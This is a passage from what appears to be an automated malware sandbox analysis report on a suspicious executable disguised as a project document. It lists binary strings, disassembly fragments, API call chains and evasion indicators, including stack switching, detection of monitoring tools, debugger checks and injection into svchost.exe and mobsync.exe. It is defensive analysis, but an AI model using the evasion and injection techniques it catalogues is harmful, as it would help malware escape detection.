                Source: Binary string: wntdll.pdb source: YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000003.1667390331.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000003.1666525007.0000000003790000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1864235310.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1775542207.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1864235310.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1774016547.0000000003800000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, mobsync.exe, 00000003.00000003.1866702963.0000000004C2D000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503573132.0000000004F7E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000003.00000003.1864869666.0000000004A78000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503573132.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: mobsync.pdb source: svchost.exe, 00000001.00000003.1832374212.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1832385716.0000000003631000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1832298452.000000000361B000.00000004.00000020.00020000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000003.2216428550.000000000145B000.00000004.00000001.00020000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000002.3502936165.0000000001447000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: mobsync.exe, 00000003.00000002.3502781470.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503963835.000000000540C000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.000000000346C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2162666518.000000003836C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: mobsync.exe, 00000003.00000002.3502781470.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503963835.000000000540C000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.000000000346C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2162666518.000000003836C000.00000004.80000000.00040000.00000000.sdmp
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007C4B37 LoadLibraryA,GetProcAddress,0_2_007C4B37
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082848F push FFFFFF8Bh; iretd 0_2_00828491
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007EE70F push edi; ret 0_2_007EE711
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007EE828 push esi; ret 0_2_007EE82A
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007E8945 push ecx; ret 0_2_007E8958
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007EEA03 push esi; ret 0_2_007EEA05
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007EEAEC push edi; ret 0_2_007EEAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004143C1 push cs; ret 1_2_004143C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403070 push eax; ret 1_2_00403072
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004120AF push ebp; retf 1_2_004120B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418172 push esi; retf 1_2_0041817D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040AADE push ebp; iretd 1_2_0040AAE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414344 push cs; ret 1_2_004143C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417C7C push esi; iretd 1_2_00417C7F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413D3D push esp; ret 1_2_00413D3E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040CE68 push ecx; retf 1_2_0040CE6B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0225F pushad ; ret 1_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C027FA pushad ; ret 1_2_03C027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C309AD push ecx; mov dword ptr [esp], ecx1_2_03C309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0283D push eax; iretd 1_2_03C02858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C01368 push eax; iretd 1_2_03C01369
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C01065 push edi; ret 1_2_03C0108A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C018F3 push edx; iretd 1_2_03C01906
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeCode function: 2_2_033D3A60 push FFFFFF98h; iretd 2_2_033D3A63
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeCode function: 2_2_033CAA4F push ecx; retf 2_2_033CAA52
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeCode function: 2_2_033D306E push ecx; retf 2_2_033D30A6
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeCode function: 2_2_033D5863 push esi; iretd 2_2_033D5866
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeCode function: 2_2_033C86C5 push ebp; iretd 2_2_033C86C7
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeCode function: 2_2_033D5D59 push esi; retf 2_2_033D5D64
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exeCode function: 2_2_033CFC96 push ebp; retf 2_2_033CFC97
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04DE27FA pushad ; ret 3_2_04DE27F9
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_04DE225F pushad ; ret 3_2_04DE27F9
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007C48D7
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_00845376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00845376
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007E3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007E3187
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeAPI/Special instruction interceptor: Address: F751CC
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000002.1668432399.000000000108A000.00000004.00000020.00020000.00000000.sdmp, YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000002.1668419174.000000000107A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E rdtsc 1_2_03C7096E
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-101865
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeAPI coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\mobsync.exeAPI coverage: 2.4 %
                Source: C:\Windows\SysWOW64\mobsync.exe TID: 1196Thread sleep count: 46 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exe TID: 1196Thread sleep time: -92000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe TID: 2124Thread sleep time: -55000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe TID: 2124Thread sleep time: -37500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\mobsync.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0082445A
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082C6D1 FindFirstFileW,FindClose,0_2_0082C6D1
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0082C75C
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0082EF95
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0082F0F2
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0082F3F3
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_008237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008237EF
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_00823B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00823B12
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0082BCBC
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02E9C560 FindFirstFileW,FindNextFileW,FindClose,3_2_02E9C560
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007C49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007C49A0
                Source: mobsync.exe, 00000003.00000002.3502781470.00000000031E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
                Source: zZyhwwvEVl.exe, 00000007.00000002.3503138544.0000000001560000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2165589495.00000138B840C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E rdtsc 1_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417543 LdrLoadDll,1_2_00417543
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_00833F09 BlockInput,0_2_00833F09
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007C3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_007C3B3A
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007F5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_007F5A7C
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_007C4B37 LoadLibraryA,GetProcAddress,0_2_007C4B37
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_00F75498 mov eax, dword ptr fs:[00000030h]0_2_00F75498
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_00F75438 mov eax, dword ptr fs:[00000030h]0_2_00F75438
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_00F73E08 mov eax, dword ptr fs:[00000030h]0_2_00F73E08
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC3CD mov eax, dword ptr fs:[00000030h]1_2_03CEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB63C0 mov eax, dword ptr fs:[00000030h]1_2_03CB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h]1_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h]1_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]1_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h]1_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h]1_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h]1_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C663FF mov eax, dword ptr fs:[00000030h]1_2_03C663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]1_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]1_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]1_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h]1_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h]1_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]1_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]1_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]1_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov ecx, dword ptr fs:[00000030h]1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA352 mov eax, dword ptr fs:[00000030h]1_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD8350 mov ecx, dword ptr fs:[00000030h]1_2_03CD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0634F mov eax, dword ptr fs:[00000030h]1_2_03D0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD437C mov eax, dword ptr fs:[00000030h]1_2_03CD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C310 mov ecx, dword ptr fs:[00000030h]1_2_03C2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50310 mov ecx, dword ptr fs:[00000030h]1_2_03C50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h]1_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov ecx, dword ptr fs:[00000030h]1_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h]1_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h]1_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D062D6 mov eax, dword ptr fs:[00000030h]1_2_03D062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h]1_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h]1_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
